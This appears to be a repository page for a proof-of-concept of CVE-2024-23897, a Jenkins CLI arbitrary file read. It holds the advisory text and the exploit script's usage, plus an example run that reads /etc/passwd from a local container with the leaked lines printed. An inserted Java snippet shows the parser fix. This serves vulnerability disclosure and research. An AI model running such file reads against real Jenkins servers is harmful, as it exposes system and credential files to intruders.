
CVE-2024-23897 PoC: Jenkins security vulnerability

Associated vulnerability
Title: Jenkins security vulnerability (CVE-2024-23897)
Description: Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Repository description
This repository presents a proof-of-concept of CVE-2024-23897.
Readme
# CVE-2024-23897
This repository presents a proof-of-concept of CVE-2024-23897 (*discovered by SonarSource*)

# CVE-2024-23897 | File read in Jenkins

## Disclaimer
This code is a proof of concept of the vulnerability, I'm not pushing anyone to use it on confluence instances they don't own.  
This tool has been developed for research and educational purposes only and I will not be held responsible for any use you may make of it.

## Description
According to the [Jenkins Security Advisory 2024-01-24](https://www.jenkins.io/security/advisory/2024-01-24/):
Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it. This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.

- Attackers with Overall/Read permission can read entire files.
- Attackers without Overall/Read permission can read the first few lines of files.
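To make the parser behaviour behind the advisory concrete from the defender's side, the following is an added example (not the repository's code): with default `ParserProperties`, args4j treats an argument beginning with `@` as a file reference and tries to open it before the command runs, whereas `ParserProperties.withAtSyntax(false)` is the args4j switch that disables that expansion and keeps the argument literal. It assumes args4j 2.33 on the classpath; `AtSyntaxDemo`, `CommandArgs` and the constructed input path are hypothetical.

```java
import java.util.ArrayList;
import java.util.List;
import org.kohsuke.args4j.Argument;
import org.kohsuke.args4j.CmdLineException;
import org.kohsuke.args4j.CmdLineParser;
import org.kohsuke.args4j.ParserProperties;

public class AtSyntaxDemo {
    // Hypothetical option bean standing in for the arguments of a CLI command.
    public static class CommandArgs {
        @Argument(metaVar = "COMMAND", usage = "Name of the command")
        public List<String> command = new ArrayList<>();
    }

    // Default ParserProperties (atSyntax = true): an argument starting with '@'
    // is replaced by the contents of the named file before the bean is filled.
    public static List<String> parseWithDefaults(String... argv) throws CmdLineException {
        CommandArgs bean = new CommandArgs();
        new CmdLineParser(bean).parseArgument(argv);
        return bean.command;
    }

    // Hardened: turn the @-file expansion off so every argument stays literal.
    public static List<String> parseWithoutAtSyntax(String... argv) throws CmdLineException {
        CommandArgs bean = new CommandArgs();
        ParserProperties props = ParserProperties.defaults().withAtSyntax(false);
        new CmdLineParser(bean, props).parseArgument(argv);
        return bean.command;
    }

    public static void main(String[] argv) {
        // Constructed input: the path after '@' deliberately does not exist, so the
        // default parser fails on the lookup instead of reading any real file.
        String[] input = {"@/nonexistent/path/for/demo"};

        try {
            parseWithDefaults(input);
            System.out.println("defaults: argument kept literal (at-syntax already off)");
        } catch (CmdLineException e) {
            // args4j reports the missing file: evidence that the '@' argument was
            // interpreted as a path by the parser, not passed through to the command.
            System.out.println("defaults: " + e.getMessage());
        }

        try {
            System.out.println("hardened: " + parseWithoutAtSyntax(input));
        } catch (CmdLineException e) {
            System.out.println("hardened: unexpected " + e.getMessage());
        }
    }
}
```

Running it shows the two behaviours side by side: the default parser rejects the argument because it tried to resolve it as a file, while the hardened parser returns the `@...` string unchanged, which is the property a patched controller relies on.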

## Help
```text
$ python3 CVE-2024-23897.py -h
usage: CVE-2024-23897.py [-h] -u URL -f FILENAME

This is a POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help   show this help message and exit
  -u URL       Url
  -f FILENAME  Filename
```

## Example
```bash
docker pull jenkins/jenkins:2.440-jdk17
docker run  -p 8080:8080 jenkins/jenkins:2.440-jdk17
```

```bash
$ python3 CVE-2024-23897.py -u http://127.0.0.1:8080 -f '/etc/passwd'
[+] Trying to recover /etc/passwd
[+] Data recovered:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
```


## References: 
- https://www.jenkins.io/security/advisory/2024-01-24/
- https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
- https://twitter.com/zin_min_phyo/status/1750827780856816063